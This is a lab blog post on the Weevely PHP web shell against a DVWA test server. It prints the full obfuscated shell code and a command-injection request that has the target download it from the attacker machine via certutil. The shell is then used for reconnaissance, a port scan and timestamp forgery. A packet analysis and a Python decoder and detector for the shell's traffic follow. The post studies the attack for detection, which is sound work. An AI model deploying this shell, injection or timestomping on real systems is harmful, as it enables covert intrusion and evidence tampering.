Sunday, September 5, 2021

Continuing Web Shell - Weevely

In the previous post, I took the opportunity to get a better understanding of web shells. In this post, I'm leveraging Weevely, which ships with Kali. There are lots of other shells such as China Chopper, C99, etc. However, I chose Weevely purely out of curiosity.

First, generate the .php file named webshell.php with a password of "SecurityNik":

┌──(root💀securitynik)-[~]
└─# weevely generate SecurityNik webshell.php
Generated 'webshell.php' with password 'SecurityNik' of 764 byte size.

With this generated, take a look at the code:

┌──(root💀securitynik)-[~]
└─# cat webshell.php 
<?php
$E=';for($i[%=0;$i<$[%l[%;){[%for($j=0;([%[%$j<$[%c&&$i<$l);$j++,$i+[%+){$[%o[%.=$t{';
$M='ean();$r=@base[%64[%[%_encode(@x(@gzco[%m[%press($o),$k[%));[%pri[%nt("$p$kh$r[%$kf");}';
$U='$k="[%e4f7[%fb[%5b";$kh="d597f2a[%3139[%[%9";$kf="499ce2[%29[%74f7";$p="Q[%Kdl0d[%L[%yL';
$p='[%et_[%con[%tents("[%php://inpu[%t"),$m)==1) {@ob_s[%tar[%t();@ev[%al(@gzu[%ncomp[%ress(';
$b='@x[%(@base6[%4_dec[%od[%e($[%m[1]),$k[%)));$o=[%@[%ob_get_contents()[%;[%@ob_end[%_[%cl';
$l='rgdCYf[%Q";fu[%nction x($[%t,[%$[%k){$c=strlen($k)[%;[%$l=st[%r[%len[%($t);$o=""';
$B=str_replace('C','','crCCeCaCtCe_fCunction');
$J='$[%i}^$k{$j};}[%}re[%turn[% $o;}i[%f (@preg_m[%atc[%h([%"/$k[%h(.+[%)$kf/[%",@file_g';
$u=str_replace('[%','',$U.$l.$E.$J.$p.$b.$M);
$q=$B('',$u);$q();
?>

Next, the file needs to get onto the target system. I'm leveraging the command injection from the previous post to upload it.

Hosting a web server on my attacking machine:

┌──(root💀securitynik)-[~]
└─# python -m SimpleHTTPServer 443
Serving HTTP on 0.0.0.0 port 443 ...

Executing the curl command and reviewing the results:

┌──(root💀securitynik)-[~]
└─# curl --cookie "security=low; PHPSESSID=knc6aiujikoks8f5vqtuc98uc9" --data "ip=127.0.0.1+%26%26+certutil+-URLcache+-f+http%3A%2F%2F10.0.0.101:443%2Fwebshell.php+main.php+%26%26+dir+main.php&Submit=Submit" --request POST 'http://10.0.0.110/dvwa/vulnerabilities/exec/'


...
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
...
Ping statistics for 127.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
...
CertUtil: -URLCache command completed successfully.
 Volume in drive C has no label.
 Volume Serial Number is 6C10-15EA

 Directory of C:\xampp\htdocs\DVWA\vulnerabilities\exec

09/04/2021  12:01 PM               764 main.php
               1 File(s)            764 bytes
               0 Dir(s)  20,947,238,912 bytes free

With the file uploaded, time to leverage Weevely.

┌──(root💀securitynik)-[~]
└─# weevely http://10.0.0.110/dvwa/vulnerabilities/exec/main.php SecurityNik

[+] weevely 4.0.1

[+] Target:     10.0.0.110
[+] Session:    /home/securitynik/.weevely/sessions/10.0.0.110/main_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> 

Now that the Weevely environment is available, time to leverage some of its features.

SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ :system_info 
+--------------------+---------------------------------------------------------------+
| document_root      | C:/xampp/htdocs                                               |
| whoami             |                                                               |
| hostname           | SECURITYNIK-WIN10                                             |
| pwd                | C:\xampp\htdocs\DVWA\vulnerabilities\exec                     |
| open_basedir       |                                                               |
| safe_mode          | False                                                         |
| script             | /dvwa/vulnerabilities/exec/main.php                           |
| script_folder      | C:\xampp\htdocs\DVWA\vulnerabilities\exec                     |
| uname              | Windows NT SECURITYNIK-WIN 10.0 build 18363 (Windows 10) i586 |
| os                 | Windows NT                                                    |
| client_ip          | 10.0.0.101                                                    |
| max_execution_time | 30                                                            |
| php_self           | /dvwa/vulnerabilities/exec/main.php                           |
| dir_sep            | \                                                             |
| php_version        | 7.2.1                                                         |
+--------------------+---------------------------------------------------------------+
SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ 


SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ ipconfig

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::a049:348c:1e6b:6497%9
   IPv4 Address. . . . . . . . . . . : 10.0.0.110
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.0.109

Performing internal reconnaissance via a port scan of 4 different hosts, looking for a handful of common ports.

SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ :net_scan 10.0.0.1,10.0.0.2,10.0.0.101,10.0.0.110 22,80,443,445,8000,9997
Scanning addresses 10.0.0.1-10.0.0.110:22-8000
Scanning addresses 10.0.0.1-10.0.0.110:9997-9997
+------------------+
| 10.0.0.101:22    |
| 10.0.0.101:8000  |
| 10.0.0.110:80    |
| 10.0.0.110:443   |
| 10.0.0.110:445   |
| 10.0.0.101:9997  |
+------------------+

Changing the date and time on the "main.php" file to blend in with index.php.

First, get the dates and times of the files:

SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ dir
...
02/05/2018  02:45 AM             1,830 index.php
09/04/2021  12:01 PM               764 main.php
...

Modifying and confirming the timestamp on the file:

SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ :file_touch -human-ts "2018-02-05 01:45 AM" main.php
New timestamp: 2018-02-05 02:45:00

SECURITYNIK-WIN10:C:\xampp\htdocs\DVWA\vulnerabilities\exec $ dir
...
02/05/2018  02:45 AM             1,830 index.php
02/05/2018  02:45 AM               764 main.php
...

I'm going to leave the rest of the commands for now, as it seems most of them are for Linux-based web servers. I could be wrong.

Looking at Weevely activity from the perspective of the packets.

First up, what User-Agent did Weevely use?

┌──(root💀securitynik)-[~]
└─# tshark -n -r weevley.pcap -T fields -e http.user_agent | sort | uniq 
Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412

We could also have looked in our "access.log" file to get that answer.

Following TCP stream 0 and looking at the payload, we see:

┌──(root💀securitynik)-[~]
└─# tshark -n -r weevley.pcap -q -z follow,tcp,ascii,0
Follow: tcp,ascii
Filter: tcp.stream eq 0
Node 0: 10.0.0.101:40922
Node 1: 10.0.0.110:80
291
POST /dvwa/vulnerabilities/exec/main.php HTTP/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Host: 10.0.0.110
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412
Connection: close


83
A/'Sc(awS|cu$J^cd597f2a31399Hagteqiq4lJQBlcFsdYzYnLpZQc499ce22974f7nS.yn=#|-5>K)[Oi
        276
HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 00:28:29 GMT
Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1
X-Powered-By: PHP/7.2.1
Content-Length: 60
Connection: close
Content-Type: text/html; charset=UTF-8

QKdl0dLyLrgdCYfQd597f2a31399HahVAlRTB2VlN2s2Yw==499ce22974f7
===================================================================

While nothing in the request headers really stands out, I have to ask what "A/'Sc(awS|cu$J^cd597f2a31399Hagteqiq4lJQBlcFsdYzYnLpZQc499ce22974f7nS.yn=#|-5>K)[Oi" in the request and "QKdl0dLyLrgdCYfQd597f2a31399HahVAlRTB2VlN2s2Yw==499ce22974f7" in the response are. Those definitely do not look like normal bodies for web requests and responses.

Looking at other streams, I see something very similar to the first stream. Here is stream 3.

┌──(root💀securitynik)-[~]
└─# tshark -n -r weevley.pcap -q -z follow,tcp,ascii,3
===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 3
Node 0: 10.0.0.101:40928
Node 1: 10.0.0.110:80
292
POST /dvwa/vulnerabilities/exec/main.php HTTP/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Content-Length: 227
Host: 10.0.0.110
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412
Connection: close


227
A/'Sc(awS|cu$J^cd597f2a31399HahD+1tp91J1tIeIdFitWsxBzRfwWI1bcUBfpxxb2SOW9UPtnI042tsbWg88dJbZY6Kn8m4Bg2N2qAnAcFzaq/Y4KaleURDC4GTJOEFwPJB1vicFnfXs9POKT6RVeKg3/nozcjO69a67sl/2GY1e2iPGG0jnKOClsJoOCGf1GFA499ce22974f7nS.yn=#|-5>K)[Oi
        325
HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 00:28:29 GMT
Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1
X-Powered-By: PHP/7.2.1
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8

QKdl0dLyLrgdCYfd597f2a31399Haht/i43HcxJGi/6Myp7rq7/SWYuqfkpNBxnPcEH02KAPjSkVbEHMTbAHo5mDlBtGA==499ce22974f7
===================================================================


What does the content in the response mean? Time for me to look at the video "Hunting and Dissecting the Weevely Web Shell - Threat Hunting Summit 2016" with Kiel Wadner.
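Reading the generated webshell.php above against the captures answers most of that question: the agent looks for a body matching /$kh(.+)$kf/, base64-decodes the middle, XORs it with $k, then gzuncompresses it; the response is built the same way in reverse. The following is an added example, not part of the original post or of Weevely itself, that inverts that channel for forensic review and flags the traffic by the static User-Agent plus the marker pair. The key and markers are the ones visible in the generated shell on this page; the sample response is constructed here.

```python
import base64
import re
import zlib
from typing import Optional

# Values taken from the generated webshell.php shown on this page
KEY = b"e4f7fb5b"           # $k  : repeating XOR key
HEADER = b"d597f2a31399"    # $kh : marker before the base64 segment
TRAILER = b"499ce22974f7"   # $kf : marker after the base64 segment
# User-Agent observed in the tshark output on this page
WEEVELY_UA = ("Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) "
              "AppleWebKit/412 (KHTML, like Gecko) Safari/412")

# Same shape as the agent's own check: /$kh(.+)$kf/
BLOB_RE = re.compile(re.escape(HEADER) + rb"(.+)" + re.escape(TRAILER), re.S)


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Mirror of the agent's x($t,$k): XOR each byte with the key, cycling."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def extract_blob(body: bytes) -> Optional[bytes]:
    """Return the base64 segment framed by $kh/$kf, or None if absent."""
    m = BLOB_RE.search(body)
    return m.group(1) if m else None


def decode_blob(blob: bytes, key: bytes = KEY) -> bytes:
    """Undo base64 -> XOR -> gzcompress (zlib) to recover the plaintext."""
    return zlib.decompress(xor_repeating(base64.b64decode(blob), key))


def encode_blob(plaintext: bytes, key: bytes = KEY) -> bytes:
    """Forward direction, used here only to build offline sample traffic."""
    return base64.b64encode(xor_repeating(zlib.compress(plaintext), key))


def is_weevely_exchange(user_agent: str, body: bytes) -> bool:
    """Detection rule: the static UA plus a body framed by this shell's markers."""
    return user_agent == WEEVELY_UA and extract_blob(body) is not None


# Response body captured in stream 0 on this page
CAPTURED_RESPONSE = b"QKdl0dLyLrgdCYfQd597f2a31399HahVAlRTB2VlN2s2Yw==499ce22974f7"
# Constructed sample, shaped like that response but with known plaintext
SAMPLE_RESPONSE = b"QKdl0dLyLrgdCYfQ" + HEADER + encode_blob(b"SECURITYNIK-WIN10") + TRAILER

if __name__ == "__main__":
    print(extract_blob(CAPTURED_RESPONSE))
    print(decode_blob(extract_blob(SAMPLE_RESPONSE)))
```

Note that $k, $kh and $kf change with every generated agent, so the marker match is specific to this shell while the User-Agent string is the more portable indicator for access.log review.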
